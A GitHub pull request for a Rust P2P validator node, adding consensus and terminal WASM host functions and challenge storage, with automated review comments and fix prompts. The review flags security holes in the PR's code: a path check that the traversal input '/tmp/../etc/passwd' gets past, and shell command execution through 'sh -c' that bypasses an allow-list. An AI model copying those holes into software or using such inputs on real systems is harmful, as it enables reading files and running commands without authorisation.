feat(infra): add P2P handlers, WASM host functions, and distributed storage for decentralized challenges #45
Conversation
… exec, and time host functions
- Add consensus and terminal module declarations and re-exports in lib.rs
- Add ConsensusPolicy and TerminalPolicy fields to InstanceConfig with defaults
- Add ConsensusState and TerminalState fields to RuntimeState
- Create consensus_state and terminal_state in instantiate()
- Register exec, time, consensus, terminal, and sandbox host functions in linker
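For orientation, registering a host function in a Wasmtime linker generally looks like the sketch below; the `RuntimeState` shape and the function body are illustrative assumptions, not this PR's actual code.

```rust
use anyhow::Result;
use wasmtime::{Caller, Engine, Linker};

// Illustrative per-instance state; the PR's real RuntimeState also carries
// consensus/terminal state and their policies.
struct RuntimeState {
    epoch: u64,
}

// Register a host function under the `platform_consensus` namespace so the
// guest can import it as (import "platform_consensus" "consensus_get_epoch").
fn register_consensus(linker: &mut Linker<RuntimeState>) -> Result<()> {
    linker.func_wrap(
        "platform_consensus",
        "consensus_get_epoch",
        |caller: Caller<'_, RuntimeState>| -> i64 { caller.data().epoch as i64 },
    )?;
    Ok(())
}

fn main() -> Result<()> {
    let engine = Engine::default();
    let mut linker: Linker<RuntimeState> = Linker::new(&engine);
    register_consensus(&mut linker)?;
    Ok(())
}
```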
…tion registrations
…torage for decentralized challenges

Implement comprehensive P2P infrastructure in platform-v2 so that future WASM challenges can operate end-to-end without any centralized server. This replaces the centralized HTTP/PostgreSQL patterns from term-challenge with P2P equivalents.

WASM Runtime (wasm-runtime-interface):
- Add consensus.rs: ConsensusPolicy, ConsensusState, ConsensusHostFunctions with platform_consensus namespace (get_epoch, get_validators, propose_weight, get_votes, get_state_hash, get_submission_count, get_block_height)
- Add terminal.rs: TerminalPolicy, TerminalState, TerminalHostFunctions with platform_terminal namespace (terminal_exec, read_file, write_file, list_dir, get_time, random_seed) with path/command allow-listing
- Implement SandboxHostFunctions HostFunctionRegistrar (sandbox.rs) with real Wasmtime linker registration for sandbox_exec, get_timestamp, log_message
- Add ChallengeStorageBackend (storage.rs) backed by real LocalStorage from distributed-storage, replacing NoopStorageBackend for production use
- Register ConsensusPolicy and TerminalPolicy in InstanceConfig and RuntimeState
- Fix formatting across consensus.rs, sandbox.rs, terminal.rs

P2P Consensus (p2p-consensus):
- Extend ChainState with leaderboard, active_jobs, task_progress, and challenge_storage_roots fields for full challenge lifecycle tracking
- Add JobRecord, JobStatus, TaskProgressRecord, LeaderboardEntry types
- Add state methods: assign_job, complete_job, update_leaderboard, get_leaderboard, update_task_progress, update_challenge_storage_root, cleanup_stale_jobs — all with proper sequence increment
- Add P2PMessage variants (appended at end for bincode compatibility): JobClaim, JobAssignment, DataRequest, DataResponse, TaskProgress, TaskResult, LeaderboardRequest, LeaderboardResponse, ChallengeUpdate, StorageProposal, StorageVote — with full message structs

Validator Node (validator-node):
- Handle all new P2P message types in handle_network_event() with proper logging and state updates (JobAssignment creates jobs, TaskProgress updates state, etc.)
- Handle previously unmatched messages: StateRequest, StateResponse, WeightVote, PeerAnnounce (replacing catch-all debug log)
- Add stale job cleanup periodic task (120s interval)
- Update WasmChallengeExecutor to use InMemoryStorageBackend (upgraded from NoopStorageBackend) and wire ConsensusPolicy/TerminalPolicy into config

Challenge SDK WASM (challenge-sdk-wasm):
- Add platform_consensus extern block with all consensus host function imports
- Add safe Rust wrappers: host_consensus_get_epoch, host_consensus_get_validators, host_consensus_propose_weight, host_consensus_get_votes, etc.
- Fix minor formatting in host_functions.rs

No breaking changes to existing EvaluationInput/EvaluationOutput serialization. New P2PMessage variants added at end of enum for backward compatibility.
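On the guest side, the SDK wrappers described above typically pair a raw extern import with a safe Rust function; a minimal sketch follows, with the exact signatures assumed rather than taken from the PR.

```rust
// Raw import from the host; only callable inside the WASM guest.
#[link(wasm_import_module = "platform_consensus")]
extern "C" {
    fn consensus_get_epoch() -> i64;
}

/// Safe wrapper: converts the raw return convention into a Result.
/// Assumes negative values signal host-side errors, per the SDK convention.
pub fn host_consensus_get_epoch() -> Result<u64, i32> {
    let raw = unsafe { consensus_get_epoch() };
    if raw < 0 {
        Err(raw as i32)
    } else {
        Ok(raw as u64)
    }
}
```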
… dependency

Move ChallengeStorageBackend from wasm-runtime-interface/storage.rs to bins/validator-node/src/challenge_storage.rs. This resolves the cyclic dependency: platform-core -> wasm-runtime-interface -> distributed-storage -> platform-core. The ChallengeStorageBackend depends on distributed-storage types (LocalStorage, StorageKey, etc.) which validator-node already depends on directly, so it belongs there rather than in the generic WASM runtime crate.

Add sha2 dependency to validator-node for the hash computation in propose_write(). Fix clippy needless_borrows_for_generic_args warnings by removing unnecessary & on hex::encode() calls.
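As a sketch of why `sha2` is now needed: a content hash over the proposed write, finished with `hex::encode` called without the needless borrow clippy flags. The helper name and exact fields are assumptions.

```rust
use sha2::{Digest, Sha256};

// Hypothetical helper mirroring the hash propose_write() computes.
fn content_hash(challenge_id: &str, key: &[u8], value: &[u8]) -> String {
    let mut hasher = Sha256::new();
    hasher.update(challenge_id.as_bytes());
    hasher.update(key);
    hasher.update(value);
    let digest = hasher.finalize();
    // clippy::needless_borrows_for_generic_args: pass the digest by value,
    // not `&digest`; hex::encode takes `impl AsRef<[u8]>`.
    hex::encode(digest)
}
```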
📝 Walkthrough

This PR introduces a comprehensive job lifecycle and consensus framework for the validator node, adding support for challenge storage, job/task tracking, and new WASM host functions for consensus and terminal operations. It extends P2P messaging with eleven new message types, enhances state management with leaderboards and job records, and integrates policy-driven consensus and terminal execution capabilities into the WASM runtime.

Changes
Sequence Diagram(s)

```mermaid
sequenceDiagram
    participant Validator as Validator Node
    participant Consensus as Consensus Module
    participant Storage as LocalStorage
    participant WASM as WASM Runtime
    Validator->>Consensus: Receive JobAssignment message
    Consensus->>Consensus: Create JobRecord (submission_id, timeout_at, Pending)
    Consensus->>Storage: Persist job record to state
    Consensus->>Validator: Push state update
    loop Every interval
        Validator->>Consensus: Cleanup stale jobs (cleanup_stale_jobs)
        Consensus->>Consensus: Identify jobs past timeout_at
        Consensus->>Consensus: Mark as TimedOut, remove from active_jobs
        Consensus->>Validator: Return cleaned job count
    end
    Validator->>Consensus: Receive TaskProgress message
    Consensus->>Consensus: Create TaskProgressRecord (task_index, progress_pct)
    Consensus->>Storage: Update task_progress collection
    Consensus->>Validator: Refresh state hash
```

```mermaid
sequenceDiagram
    participant Guest as WASM Guest
    participant HostFunctions as Host Functions Registry
    participant ConsensusState as Consensus State
    participant TerminalState as Terminal State
    participant Policy as Policy Checker
    Guest->>HostFunctions: Call consensus_propose_weight(uid, weight)
    HostFunctions->>Policy: Check consensus_policy.allow_weight_proposals
    Policy-->>HostFunctions: Policy enabled?
    HostFunctions->>ConsensusState: Increment weight_proposals_made
    HostFunctions->>Policy: Check max_weight_proposals limit
    Policy-->>HostFunctions: Limit exceeded?
    alt Limit not exceeded
        HostFunctions->>ConsensusState: Record proposed_weight
        HostFunctions-->>Guest: Return Success (0)
    else Limit exceeded
        HostFunctions-->>Guest: Return ProposalLimitExceeded (-2)
    end
    Guest->>HostFunctions: Call terminal_exec(cmd)
    HostFunctions->>Policy: Check terminal_policy.allowed_commands
    Policy-->>HostFunctions: Command allowed?
    HostFunctions->>Policy: Check max_executions limit
    Policy-->>HostFunctions: Execution count OK?
    alt All checks pass
        HostFunctions->>TerminalState: Execute command (with timeout)
        HostFunctions->>TerminalState: Update bytes_written
        HostFunctions-->>Guest: Write SandboxExecResponse to WASM memory
    else Policy violation
        HostFunctions-->>Guest: Return TerminalHostStatus error
    end
```
Estimated code review effort: 🎯 4 (Complex) | ⏱️ ~75 minutes

Possibly related PRs
Actionable comments posted: 11
Caution
Some comments are outside the diff and can’t be posted inline due to platform limitations.
⚠️ Outside diff range comments (1)
crates/p2p-consensus/src/state.rs (1)
237-261: ⚠️ Potential issue | 🟠 Major

`update_hash` does not incorporate new state fields, weakening integrity verification.

The `HashInput` struct only includes `sequence`, `epoch`, `validator_count`, `challenge_count`, `pending_count`, and `netuid`. The newly added fields — `leaderboard`, `active_jobs`, `task_progress`, and `challenge_storage_roots` — are never reflected in the state hash. This means `apply_sync_state` (line 745) cannot detect tampering with these fields, since the hash verification won't catch modifications.

Consider extending `HashInput` to include counts or digests of the new collections:

Proposed fix sketch

```diff
 #[derive(Serialize)]
 struct HashInput {
     sequence: SequenceNumber,
     epoch: u64,
     validator_count: usize,
     challenge_count: usize,
     pending_count: usize,
     netuid: u16,
+    active_jobs_count: usize,
+    leaderboard_count: usize,
+    task_progress_count: usize,
+    storage_roots_count: usize,
 }

 let input = HashInput {
     sequence: self.sequence,
     epoch: self.epoch,
     validator_count: self.validators.len(),
     challenge_count: self.challenges.len(),
     pending_count: self.pending_evaluations.len(),
     netuid: self.netuid,
+    active_jobs_count: self.active_jobs.len(),
+    leaderboard_count: self.leaderboard.len(),
+    task_progress_count: self.task_progress.len(),
+    storage_roots_count: self.challenge_storage_roots.len(),
 };
```

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@crates/p2p-consensus/src/state.rs` around lines 237 - 261, The state hash in update_hash currently omits new fields (leaderboard, active_jobs, task_progress, challenge_storage_roots) so extend the HashInput used in update_hash to include deterministic representations of those fields (e.g., counts and/or a digest/hash of their contents) so mutations are reflected in state_hash; update the HashInput struct to add fields like leaderboard_count/leaderboard_digest, active_jobs_count/active_jobs_digest, task_progress_count/task_progress_digest, challenge_storage_roots_count/challenge_storage_roots_digest, populate them from self (using lengths and a stable serialization + hash for digests via the existing hash_data helper), and keep apply_sync_state verification working against the updated state_hash.
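If digests rather than bare counts are preferred, one deterministic way to fold a collection into `HashInput` is sketched below. `hash_data` here is a stand-in for the crate's existing helper mentioned in the prompt, and the serialization choice is an assumption; the collections must iterate in a stable order (e.g. `BTreeMap`) for this to be deterministic.

```rust
use serde::Serialize;
use sha2::{Digest, Sha256};
use std::collections::BTreeMap;

// Stand-in for the crate's hash_data helper: stable serialization + SHA-256.
fn hash_data<T: Serialize>(value: &T) -> [u8; 32] {
    let bytes = bincode::serialize(value).expect("state is serializable");
    Sha256::digest(&bytes).into()
}

#[derive(Serialize)]
struct HashInput {
    sequence: u64,
    // ... existing fields elided ...
    // A digest catches in-place mutations that a bare count would miss.
    active_jobs_digest: [u8; 32],
    leaderboard_digest: [u8; 32],
}

fn build_input(
    sequence: u64,
    active_jobs: &BTreeMap<String, u64>,
    leaderboard: &BTreeMap<String, u64>,
) -> HashInput {
    HashInput {
        sequence,
        active_jobs_digest: hash_data(active_jobs),
        leaderboard_digest: hash_data(leaderboard),
    }
}
```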
🧹 Nitpick comments (2)
crates/p2p-consensus/src/state.rs (1)
656-660: `update_task_progress` calls `update_hash()` instead of `increment_sequence()` — inconsistent with sibling methods.

All other mutation methods (`assign_job`, `complete_job`, `update_leaderboard`, `update_challenge_storage_root`, `cleanup_stale_jobs`) call `increment_sequence()`. This method only calls `update_hash()`, which won't increment the sequence number. If this is intentional (to reduce sequence churn for frequent progress updates), a brief comment explaining the rationale would help. Otherwise, consider aligning with the other methods.

🤖 Prompt for AI Agents

Verify each finding against the current code and only fix it if needed. In `@crates/p2p-consensus/src/state.rs` around lines 656 - 660, The method update_task_progress currently calls update_hash() but all other mutating methods (assign_job, complete_job, update_leaderboard, update_challenge_storage_root, cleanup_stale_jobs) call increment_sequence(); update_task_progress should be changed to call increment_sequence() after inserting the record to keep sequence behavior consistent, or if the omission is intentional add a concise comment in update_task_progress explaining why sequence should not be incremented (e.g., to avoid sequence churn for frequent progress updates) so future readers understand the rationale.

bins/validator-node/src/main.rs (1)
799-827: Stub handlers — several new message types are log-only with no processing.

`StateRequest`, `StateResponse`, `WeightVote`, and `PeerAnnounce` handlers only log and discard the message. For `StateRequest` in particular, the expected behavior is to respond with the current state. Consider adding TODO comments to track the remaining implementation work.

Would you like me to open issues to track implementing the response logic for these message types?
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed. In `@bins/validator-node/src/main.rs` around lines 799 - 827, Handlers for P2PMessage::StateRequest, P2PMessage::StateResponse, P2PMessage::WeightVote, and P2PMessage::PeerAnnounce are currently no-ops that only debug-log and drop the message; add explicit TODO comments and stub call sites and implement immediate behavior: for P2PMessage::StateRequest(req) call a new or existing handle_state_request(req) that prepares and sends the current state response, for P2PMessage::StateResponse(resp) call handle_state_response(resp) to validate/merge remote state or enqueue for processing, for P2PMessage::WeightVote(wv) call handle_weight_vote(wv) to validate and apply or forward the vote, and for P2PMessage::PeerAnnounce(pa) call handle_peer_announce(pa) to update peer table and dial addresses; include clear TODO markers in each branch and return early only after invoking the appropriate handler so future work is tracked and the request/response path for StateRequest is functional.
🤖 Prompt for all review comments with AI agents
Verify each finding against the current code and only fix it if needed.
Inline comments:
In `@bins/validator-node/src/challenge_storage.rs`:
- Around line 42-46: The current hash construction in the block that creates a
Sha256 hasher (Sha256::new(), then hasher.update(challenge_id.as_bytes()),
hasher.update(key), hasher.update(value), hasher.finalize()) concatenates fields
without delimiters and can cause boundary collisions; change the hashing to
include unambiguous separators or length prefixes (e.g., write the length of
challenge_id, key, and value before each field or insert a fixed sentinel byte
between fields) so the input to hasher.update is canonical and
collision-resistant; update the code around the hasher usage (the hasher
variable and the three hasher.update(...) calls) to apply this length-prefix or
delimiter strategy and then finalize as before.
In `@bins/validator-node/src/main.rs`:
- Around line 874-897: The TaskProgress handler is mutating state without
verifying the progress.signature; before calling state.update_task_progress
(inside the P2PMessage::TaskProgress arm where TaskProgressRecord is built),
validate the signature on progress using the validator's public key and a
canonical serialization of the progress data (e.g., submission_id, challenge_id,
task_index, total_tasks, status, progress_pct, timestamp) and only call
state_manager.apply/update_task_progress if signature verification succeeds; if
verification fails, log and discard the message. Ensure you perform the check on
progress.signature and use the existing signature verification utility in the
codebase (or add one) so the verification occurs prior to creating/updating the
TaskProgressRecord and invoking state.update_task_progress.
- Around line 836-855: Replace the hardcoded 300_000 timeout in the
JobAssignment handler with a named constant (e.g., JOB_ASSIGNMENT_TIMEOUT_MS) to
improve clarity and maintainability: define the constant near related types or
at module scope and use it when computing JobRecord.timeout_at (currently set as
assignment.timestamp + 300_000) so it becomes assignment.timestamp +
JOB_ASSIGNMENT_TIMEOUT_MS; update any related comments or docs and leave
signature verification untouched since it's handled in
handle_gossipsub_message().
In `@crates/challenge-sdk-wasm/src/host_functions.rs`:
- Around line 234-242: The wrappers host_consensus_get_validators,
host_consensus_get_votes and host_consensus_get_state_hash treat a returned
status of 1 (ConsensusHostStatus::Disabled) as success and truncate the buffer;
update each function to treat status == 1 as an error (i.e., return Err(status))
rather than truncating/returning data — only treat genuinely successful status
values as success (e.g., status > 1 for payload-returning calls), and keep the
existing negative-error check; change the conditional around the unsafe
consensus_* call in host_consensus_get_validators, host_consensus_get_votes and
host_consensus_get_state_hash to explicitly return Err(status) when status == 1
(or otherwise not in the valid-success range) so disabled responses are not
misinterpreted as data.
In `@crates/wasm-runtime-interface/src/consensus.rs`:
- Around line 253-274: handle_propose_weight currently only checks uid and
weight are non-negative and then casts them to u16, causing silent truncation;
update handle_propose_weight to validate that both uid and weight are within
u16::MAX before casting (e.g., check uid <= u16::MAX and weight <= u16::MAX),
return ConsensusHostStatus::InvalidArgument.to_i32() if out of range, and only
then cast to u16 when pushing into
caller.data_mut().consensus_state.proposed_weights while leaving the other logic
(policy checks, weight_proposals_made increment) unchanged.
- Around line 30-39: The enum ConsensusHostStatus has a positive value for
Disabled which breaks the SDK convention that non-success statuses are negative;
change ConsensusHostStatus::Disabled to a negative value (e.g., -1 or another
unused negative code) and update any conversion/mapper (e.g., from_i32 or match
arms that map i32→ConsensusHostStatus) to reflect the new negative value so SDK
wrappers that treat status<0 as error work correctly; ensure no other variant
collisions occur when renumbering.
In `@crates/wasm-runtime-interface/src/sandbox.rs`:
- Around line 428-456: The current synchronous write_all to child.stdin after
spawning (in the block referencing cmd.spawn(), has_stdin, request.stdin,
write_all and child.stdin) can deadlock if the child fills stdout/stderr buffers
before reading stdin; move stdin writing off the main thread by spawning a
dedicated thread to take child.stdin, write_all the bytes, and then drop/close
it (or use wait_with_output which concurrently handles stdio) before entering
the existing timeout loop that polls child.try_wait() and uses wait_with_output;
ensure the writer thread is detached or joined appropriately and that errors
from the write are converted to SandboxExecError::ExecutionFailed so the
timeout/kill logic (start, timeout, child.kill,
SandboxExecError::ExecutionTimeout) still functions correctly.
In `@crates/wasm-runtime-interface/src/terminal.rs`:
- Around line 30-43: TerminalHostStatus::Disabled is currently set to a positive
value (1) which breaks the SDK's error-detection pattern (status < 0); change
the Disabled variant in the TerminalHostStatus enum to a negative error code
(e.g., -8 or another unused negative value) so it is treated as an error by SDK
wrappers like host_terminal_exec, and update any related docs/tests/constants
that assume the old value.
- Around line 139-147: The is_path_allowed function currently checks prefixes
with path.starts_with(p) which allows path traversal like "/tmp/../etc/passwd";
change the check to compare normalized/canonicalized paths: normalize the
incoming path (resolve "."/".." components and make it absolute) and normalize
the stored allowed_paths before comparison (or canonicalize both using
std::fs::canonicalize where possible), and on any canonicalization/error return
false; update the same prefix-check logic in the other occurrence of this
permission check so comparisons use normalized absolute paths rather than raw
starts_with.
- Around line 565-600: handle_terminal_random_seed currently uses
chrono::Utc::now() when fixed_timestamp_ms is None which yields
non-deterministic seeds across validators; change to only use deterministic
inputs (challenge_id and a deterministic per-call counter stored on
RuntimeState) and fail if fixed_timestamp_ms is not set or omit timestamp
entirely. Specifically: in handle_terminal_random_seed, remove the chrono::Utc
fallback and instead read a call counter field on RuntimeState (e.g., add or use
runtime_state.terminal_seed_counter), include that counter and challenge_id in
the Sha256 input (hasher.update(counter.to_le_bytes())), then increment and
persist the counter back to caller.data() before returning; if you must use a
timestamp require fixed_timestamp_ms to be Some and return
TerminalHostStatus::InternalError when it is None so seeds remain deterministic
across validators. Ensure the unique symbols mentioned
(handle_terminal_random_seed, fixed_timestamp_ms, RuntimeState,
terminal_seed_counter, write_wasm_memory) are updated accordingly.
- Around line 283-375: handle_terminal_exec currently validates only the first
token (command_name) but then runs the entire cmd_str via "sh -c", and it blocks
on child.wait_with_output(), allowing allowlist bypass and hanging; fix by (1)
rejecting or sanitizing any shell metacharacters in cmd_str or, better, parse
cmd_str into an argv vector and execute the binary directly
(Command::new(&argv[0]).args(&argv[1..])) so no shell interpretation occurs —
update the use of command_name/cmd_str parsing and the spawn call accordingly —
and (2) replace the blocking child.wait_with_output() with a nonblocking timeout
implementation (use child.try_wait() in a loop with
Instant::now()+Duration::from_millis(timeout_ms) and sleep small intervals,
killing the child via child.kill() if deadline exceeded, or run the child on a
background thread and join with a timeout) so timeout_ms is enforced; adjust
error returns/logs in handle_terminal_exec to reflect killed/timeouts.
---
Outside diff comments:
In `@crates/p2p-consensus/src/state.rs`:
- Around line 237-261: The state hash in update_hash currently omits new fields
(leaderboard, active_jobs, task_progress, challenge_storage_roots) so extend the
HashInput used in update_hash to include deterministic representations of those
fields (e.g., counts and/or a digest/hash of their contents) so mutations are
reflected in state_hash; update the HashInput struct to add fields like
leaderboard_count/leaderboard_digest, active_jobs_count/active_jobs_digest,
task_progress_count/task_progress_digest,
challenge_storage_roots_count/challenge_storage_roots_digest, populate them from
self (using lengths and a stable serialization + hash for digests via the
existing hash_data helper), and keep apply_sync_state verification working
against the updated state_hash.
---
Nitpick comments:
In `@bins/validator-node/src/main.rs`:
- Around line 799-827: Handlers for P2PMessage::StateRequest,
P2PMessage::StateResponse, P2PMessage::WeightVote, and P2PMessage::PeerAnnounce
are currently no-ops that only debug-log and drop the message; add explicit TODO
comments and stub call sites and implement immediate behavior: for
P2PMessage::StateRequest(req) call a new or existing handle_state_request(req)
that prepares and sends the current state response, for
P2PMessage::StateResponse(resp) call handle_state_response(resp) to
validate/merge remote state or enqueue for processing, for
P2PMessage::WeightVote(wv) call handle_weight_vote(wv) to validate and apply or
forward the vote, and for P2PMessage::PeerAnnounce(pa) call
handle_peer_announce(pa) to update peer table and dial addresses; include clear
TODO markers in each branch and return early only after invoking the appropriate
handler so future work is tracked and the request/response path for StateRequest
is functional.
In `@crates/p2p-consensus/src/state.rs`:
- Around line 656-660: The method update_task_progress currently calls
update_hash() but all other mutating methods (assign_job, complete_job,
update_leaderboard, update_challenge_storage_root, cleanup_stale_jobs) call
increment_sequence(); update_task_progress should be changed to call
increment_sequence() after inserting the record to keep sequence behavior
consistent, or if the omission is intentional add a concise comment in
update_task_progress explaining why sequence should not be incremented (e.g., to
avoid sequence churn for frequent progress updates) so future readers understand
the rationale.
```rust
let mut hasher = Sha256::new();
hasher.update(challenge_id.as_bytes());
hasher.update(key);
hasher.update(value);
Ok(hasher.finalize().into())
```
Hash over concatenated fields without delimiters can produce collisions.
SHA256(challenge_id || key || value) without length-prefixed or delimited fields is theoretically susceptible to boundary confusion (e.g., challenge_id="ab" + key=[0x63] produces the same hash input as challenge_id="abc" + key=[]). Practical risk is low if challenge IDs are UUIDs, but for correctness it's worth adding a separator or length prefix.
Proposed fix
```diff
 let mut hasher = Sha256::new();
 hasher.update(challenge_id.as_bytes());
+hasher.update(b":");
 hasher.update(key);
+hasher.update(b":");
 hasher.update(value);
 Ok(hasher.finalize().into())
```
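If the separator byte could ever legally appear in `challenge_id`, length-prefixing each field removes the ambiguity entirely, which is the other option the comment mentions. A minimal sketch of that alternative:

```rust
use sha2::{Digest, Sha256};

// Length-prefix each field so "ab" + [0x63] and "abc" + [] hash differently.
fn keyed_hash(challenge_id: &str, key: &[u8], value: &[u8]) -> [u8; 32] {
    let mut hasher = Sha256::new();
    for field in [challenge_id.as_bytes(), key, value] {
        hasher.update((field.len() as u64).to_le_bytes());
        hasher.update(field);
    }
    hasher.finalize().into()
}
```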
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@bins/validator-node/src/challenge_storage.rs` around lines 42 - 46, The
current hash construction in the block that creates a Sha256 hasher
(Sha256::new(), then hasher.update(challenge_id.as_bytes()), hasher.update(key),
hasher.update(value), hasher.finalize()) concatenates fields without delimiters
and can cause boundary collisions; change the hashing to include unambiguous
separators or length prefixes (e.g., write the length of challenge_id, key, and
value before each field or insert a fixed sentinel byte between fields) so the
input to hasher.update is canonical and collision-resistant; update the code
around the hasher usage (the hasher variable and the three hasher.update(...)
calls) to apply this length-prefix or delimiter strategy and then finalize as
before.
```rust
P2PMessage::JobAssignment(assignment) => {
    info!(
        submission_id = %assignment.submission_id,
        challenge_id = %assignment.challenge_id,
        assigned_validator = %assignment.assigned_validator.to_hex(),
        assigner = %assignment.assigner.to_hex(),
        "Received job assignment"
    );
    let job = JobRecord {
        submission_id: assignment.submission_id.clone(),
        challenge_id: assignment.challenge_id,
        assigned_validator: assignment.assigned_validator,
        assigned_at: assignment.timestamp,
        timeout_at: assignment.timestamp + 300_000,
        status: JobStatus::Pending,
    };
    state_manager.apply(|state| {
        state.assign_job(job);
    });
}
```
🧩 Analysis chain
🏁 Scripts executed (all against Repository: PlatformNetwork/platform-v2; output lengths noted inline):

```bash
#!/bin/bash
# Search for signature verification patterns in the codebase
rg -n "verify.*signature|signature.*verify|verify_message|verify_signed" --type=rs -C3   # Length of output: 97
# Search for timeout constants and magic numbers related to 300000
rg -n "300000|300_000|timeout.*const|TIMEOUT.*=|Job.*timeout" --type=rs | head -30   # Length of output: 97
# Find where P2PMessage enum is defined and how it's processed
rg -n "enum P2PMessage|handle_network_event|process.*message" --type=rs -A5 | head -50   # Length of output: 97
# Search for signature verification patterns - look in .rs files
find bins/validator-node/src -name "*.rs" -exec grep -n "verify.*signature\|signature.*verify\|verify_message\|verify_signed" {} + 2>/dev/null   # Length of output: 53
# Search for timeout constants and the 300_000 magic number
find bins/validator-node/src -name "*.rs" -exec grep -n "300_000\|TIMEOUT\|timeout.*const" {} + 2>/dev/null | head -40   # Length of output: 170
# Find P2PMessage enum definition and handler structure
find . -name "*.rs" -exec grep -l "enum P2PMessage\|handle_network_event" {} + 2>/dev/null   # Length of output: 143
# Check the P2PMessage structure in messages.rs
cat crates/p2p-consensus/src/messages.rs | head -150   # Length of output: 5110
# Search for where messages are received/parsed in main.rs to see if validation happens before the handler
grep -n "handle_network_event\|received.*message\|P2PMessage::" bins/validator-node/src/main.rs | head -20   # Length of output: 1042
# Look for any network layer validation or message verification
find . -name "*.rs" -path "*/p2p*" -o -name "*.rs" -path "*/network*" 2>/dev/null | xargs grep -l "verify\|validate" 2>/dev/null | head -10   # Length of output: 344
# Get the JobAssignmentMessage structure definition
grep -A20 "pub struct JobAssignmentMessage" crates/p2p-consensus/src/messages.rs   # Length of output: 740
# Check the network.rs file for message validation/verification logic
cat crates/p2p-consensus/src/network.rs | head -200   # Length of output: 6307
# Search for signature verification implementation
grep -rn "verify.*signature\|validate.*signature" crates/p2p-consensus/src/ 2>/dev/null   # Length of output: 877
# Search for SignedP2PMessage definition and usage
grep -rn "SignedP2PMessage\|struct Signed" crates/p2p-consensus/src/messages.rs | head -20   # Length of output: 173
# Look for where messages are validated after reception but before handler
grep -n "from_bytes\|deserialize\|receive\|handle_message" crates/p2p-consensus/src/network.rs | head -30   # Length of output: 574
# Check if there's validation logic around message processing
grep -B5 -A10 "P2PMessage::JobAssignment\|verify_signature.*assignment\|assignment.*verify" bins/validator-node/src/main.rs   # Length of output: 824
# Get the full SignedP2PMessage struct definition
sed -n '610,650p' crates/p2p-consensus/src/messages.rs   # Length of output: 1123
# Check how messages are actually dispatched in the event loop - look around line 432
sed -n '420,450p' bins/validator-node/src/main.rs   # Length of output: 1355
# Search for any validation or signature checks on P2PMessage before handler dispatch
grep -B10 "handle_network_event" bins/validator-node/src/main.rs | grep -E "verify|validate|signature|sign"   # Length of output: 53
# Confirm the pattern - check if Submission handler also doesn't verify signature
sed -n '723,760p' bins/validator-node/src/main.rs   # Length of output: 1787
# Check where SignedP2PMessage gets unwrapped/deserialized
grep -n "SignedP2PMessage\|verify.*signature" crates/p2p-consensus/src/network.rs | head -20   # Length of output: 405
# Get the full verify_message implementation
sed -n '420,460p' crates/p2p-consensus/src/network.rs   # Length of output: 1549
# Search for where verify_message is actually called
grep -rn "verify_message" crates/p2p-consensus/src/ bins/validator-node/src/   # Length of output: 263
# Look at the message deserialization flow - line 446 onwards
sed -n '440,500p' crates/p2p-consensus/src/network.rs   # Length of output: 2485
```
Extract job assignment timeout to a named constant.
The assignment.timestamp + 300_000 is a hardcoded 5-minute timeout that should be extracted to a named constant for clarity and maintainability.
Signature verification is already handled at the network layer in handle_gossipsub_message(), which validates all incoming messages before they reach the handlers, so no additional verification is needed here.
Proposed constant extraction

```diff
+/// Default job assignment timeout in milliseconds (5 minutes)
+const JOB_ASSIGNMENT_TIMEOUT_MS: i64 = 300_000;
+
 // ... in the handler:
-    timeout_at: assignment.timestamp + 300_000,
+    timeout_at: assignment.timestamp + JOB_ASSIGNMENT_TIMEOUT_MS,
```

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@bins/validator-node/src/main.rs` around lines 836 - 855, Replace the
hardcoded 300_000 timeout in the JobAssignment handler with a named constant
(e.g., JOB_ASSIGNMENT_TIMEOUT_MS) to improve clarity and maintainability: define
the constant near related types or at module scope and use it when computing
JobRecord.timeout_at (currently set as assignment.timestamp + 300_000) so it
becomes assignment.timestamp + JOB_ASSIGNMENT_TIMEOUT_MS; update any related
comments or docs and leave signature verification untouched since it's handled
in handle_gossipsub_message().
```rust
P2PMessage::TaskProgress(progress) => {
    debug!(
        submission_id = %progress.submission_id,
        challenge_id = %progress.challenge_id,
        validator = %progress.validator.to_hex(),
        task_index = progress.task_index,
        total_tasks = progress.total_tasks,
        progress_pct = progress.progress_pct,
        "Received task progress"
    );
    let record = TaskProgressRecord {
        submission_id: progress.submission_id.clone(),
        challenge_id: progress.challenge_id,
        validator: progress.validator,
        task_index: progress.task_index,
        total_tasks: progress.total_tasks,
        status: progress.status,
        progress_pct: progress.progress_pct,
        updated_at: progress.timestamp,
    };
    state_manager.apply(|state| {
        state.update_task_progress(record);
    });
}
```
TaskProgress handler also processes state mutations without signature verification.
The TaskProgress handler creates a TaskProgressRecord and updates state via state.update_task_progress(record) without verifying the progress.signature. A malicious peer could forge progress updates for submissions it isn't assigned to evaluate.
Same guideline concern as the JobAssignment handler above.
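A sketch of the verify-before-apply pattern this comment asks for, using `ed25519_dalek` purely as a stand-in; the real key type and the codebase's canonical serialization are assumptions.

```rust
use ed25519_dalek::{Signature, Verifier, VerifyingKey};

// Hypothetical canonical encoding of the signed progress fields.
// Length-prefix the variable-length id so the encoding is unambiguous.
fn canonical_bytes(submission_id: &str, task_index: u32, progress_pct: u8, timestamp: i64) -> Vec<u8> {
    let mut buf = Vec::new();
    buf.extend_from_slice(&(submission_id.len() as u64).to_le_bytes());
    buf.extend_from_slice(submission_id.as_bytes());
    buf.extend_from_slice(&task_index.to_le_bytes());
    buf.push(progress_pct);
    buf.extend_from_slice(&timestamp.to_le_bytes());
    buf
}

// Only mutate state when the signature checks out; otherwise drop the message.
fn verify_progress(
    key: &VerifyingKey,
    sig: &Signature,
    submission_id: &str,
    task_index: u32,
    progress_pct: u8,
    timestamp: i64,
) -> bool {
    let msg = canonical_bytes(submission_id, task_index, progress_pct, timestamp);
    key.verify(&msg, sig).is_ok()
}
```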
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.
In `@bins/validator-node/src/main.rs` around lines 874 - 897, The TaskProgress
handler is mutating state without verifying the progress.signature; before
calling state.update_task_progress (inside the P2PMessage::TaskProgress arm
where TaskProgressRecord is built), validate the signature on progress using the
validator's public key and a canonical serialization of the progress data (e.g.,
submission_id, challenge_id, task_index, total_tasks, status, progress_pct,
timestamp) and only call state_manager.apply/update_task_progress if signature
verification succeeds; if verification fails, log and discard the message.
Ensure you perform the check on progress.signature and use the existing
signature verification utility in the codebase (or add one) so the verification
occurs prior to creating/updating the TaskProgressRecord and invoking
state.update_task_progress.
```rust
